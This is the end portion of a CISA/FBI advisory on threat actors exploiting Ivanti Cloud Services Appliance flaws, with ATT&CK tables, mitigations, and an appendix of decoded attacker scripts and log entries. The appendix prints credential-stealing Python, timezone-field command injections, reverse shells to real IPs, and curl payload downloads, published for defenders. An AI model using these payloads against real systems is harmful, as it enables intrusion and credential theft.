See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Reconnaissance

Technique Title
ID
Use

Active Scanning: Vulnerability Scanning
T1595.002
Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities.

Table 5: Initial Access

Technique Title
ID
Use

Exploit Public-Facing Application
T1190
Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications.

Table 6: Execution

Technique Title
ID
Use

Command and Scripting Interpreter
T1059
Threat actors abused command and script interpreters to execute commands, scripts, or binaries.

Table 7: Persistence

Technique Title
ID
Use

Modify Authentication Process
T1556
Threat actors executed an authentication bypass by exploiting the authentication mechanisms of a device to gain access to organizations’ networks.

Server Software Component: Web Shell
T1505.003
Threat actors executed code to implant webshells for persistence.

Table 8: Privilege Escalation

Technique Title
ID
Use

Exploitation for Privilege Escalation
T1068
Threat actors leveraged weaknesses to gain access via an outdated, vulnerable version of a server.

Table 9: Defense Evasion

Technique Title
ID
Use

Hide Artifacts: Hidden Users
T1564.002
Threat actors acted as a hidden user to disguise their presence on a system.

Deobfuscate/Decode Files or Information
T1140
Threat actors decrypted credentials prior to exfiltration by leveraging native tools located in the extracted backup file.

Abuse Elevation Control Mechanism: Sudo and Sudo Caching
T1548.003
Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation.

Table 10: Credential Access

Technique Title
ID
Use

Unsecured Credentials: Credentials in Files
T1552.001
Threat actors harvested encrypted admin credentials to gain further access.

Table 11: Lateral Movement

Technique Title
ID
Use

Exploitation of Remove Services
T1210
Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems.

Table 12: Command and Control

Technique Title
ID
Use

Remote Access Software
T1219
Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance.

Application Layer: Web Protocol
T1071.001
Threat actors used tools such as GET or POST requests to acquire session and CSRF tokens.

Table 13: Exfiltration

Technique Title
ID
Use

Exfiltration
TA0010
Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use.

Incident Response
If compromise is detected, the authoring agencies recommend that organizations:

Quarantine or take offline potentially affected hosts.
Reimage compromised hosts.
Provision new account credentials.
For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol and AD.
Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Mitigations
CISA and FBI recommend organizations: 

Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support.
Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity.
Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
Secure remote access tools by:

Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.

Strictly limit the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:

Audit the network for systems using RDP.
Close unused RDP ports.
Enforce account lockouts after a specified number of attempts.
Apply phishing-resistant multifactor authentication (MFA).
Log RDP login attempts.

Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
Follow best cybersecurity practices in your production and enterprise environments,including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

Validate Security Controls
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:

Select an ATT&CK technique described in this advisory (see Table 4 through Table 13).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
References

Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)
Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)
Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)
Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA

Contact Information
Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:

CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Disclaimer
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
Version History
January 22, 2025: Initial version.
Appendix A: Encoded and Decoded Scripts
Decoded Python Scripts

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin’\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’service'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’service’\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)

import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0,attempts=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
with open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip()   v = p.split(‘:’)   k = os.popen(‘base 64 -w0 root/.certs/{}.key’.format(v[1])).read()   set_msg(dbpwd, “PASSWORD”, p+’||’+k)   time.sleep(30)   set_msg(dbpwd)}

{import os, re, base64, time
def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
os.chdir(“/tmp”)d = “/backups”try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))   if r:       p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)       os.system(“tar zxvf {}”.format(r))       while True:           for f in os.listdir(‘.’):               if re.match(“phpw{6}”, f):                   os.chmod(f, 0o777)                   m = os.popen(“./{} ‘{}’ ‘{}’ ‘{}’ root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()                   if m:                       set_msg(dbpwd, “PASSWORD”, m)                       time.sleep(30)                       set_msg(dbpwd)                       exit()   else:       set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

Decoded datetime.php ‘timezone’ Exploit base64 Scripts

{Sep  5 01:09:59 REDACTED gsb[996]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep  5 01:47:01 REDACTED gsb[2599]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)}

{Sep  5 02:14:08 REDACTED gsb[1273]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep  5 22:22:06 REDACTED gsb[9367]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep  6 02:39:11 REDACTED gsb[21266]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  | /usr/bin/base64 -d | python;’ (1)}

{Sep  6 03:03:44 REDACTED gsb[11427]: /etc/php.inirewritten with new timezone: ‘;bash /tmp/Xa27efd2.tmp;’ (1)}

{Sep  8 05:18:35 REDACTED gsb[5132]: /etc/php.inirewritten with new timezone: ‘;/sbin/backuptool –backup;’ (1)}

{Sep  8 05:19:34 REDACTED gsb[5325]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python;’ (1)}

{Sep  8 10:37:35 REDACTED gsb[6196]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 -ssl -e /bin/bash;’ (1)}

{Sep  8 10:40:38 REDACTED gsb[8758]: /etc/php.inirewritten with new timezone: ‘;curl https://gggg.oyr2ohrm.eyes.sh/;’ (1)}

{Sep  8 10:41:35 REDACTED gsb[7475]: /etc/php.inirewritten with new timezone: ‘;curl 98.98.54.209/a.sh -o /dev/shm/a.sh;’ (1)}

{Sep  8 13:10:37 REDACTED gsb[22555]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 –ssl -e /bin/bash;’ (1)}

{Sep  8 13:21:06 REDACTED gsb[24954]: /etc/php.inirewritten with new timezone: ‘;nc REDACTED80 –ssl -e /bin/bash;’ (1)}

{Sep  8 20:23:14 REDACTED gsb[1899]: /etc/php.inirewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):  if t and m:      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())  else:      msg = ”  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:  r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)  os.system(“tar zxvf {}”.format(r))  while True:      for f in os.listdir(‘.’):          if re.match(“phpw{6}”, f):              os.chmod(f, 0o777)              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()              if m:                  set_msg(dbpwd, “PASSWORD”, m)                  time.sleep(30)                  set_msg(dbpwd)                  exit()else:  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)}

{Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“45.33.101.53”,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’== | /usr/bin/base64 -d | /bin/bash;’ (1)}

{Sep 10 11:48:32 csa gsb[6829]: /etc/php.inirewritten with new timezone: ‘;/bin/python -c ‘importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“156.234.193.18”,44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’;’ (1)}

{Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.inirewritten with new timezone: ‘;/usr/bin/echo import os, re, timeos.chdir(“/tmp”)d = “/backups/backup-09-01-2024_010101.tar.gz”with open(“/opt/landesk/broker/broker.conf”) as f:  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if os.path.exists(d):  os.system(“tar zxf {}”.format(d))  pwd = os.popen(“export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().strip()  p = pwd.split(‘:’)  k = os.popen(“cat root/.certs/{}.0″.format(p[1])).read().strip()  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, ‘{}’, ‘1’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[0:200], k[200:700]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, ‘{}’, ‘2’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[700:900], k[900:]))  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, ‘{}’, ‘3’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, pwd[0:200], pwd[200:700]))  time.sleep(60)  os.system(”’export PGPASSWORD={};echo “DELETE FROM blockedcerts”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))  os.system(“rm -rdf *;rm -rf *”)== | /usr/bin/base64 -d | python;’ (1)}

Appendix B: Sudo Commands
See Table 14 for a list of known sudo commands executed by the threat actors.

Command
Use

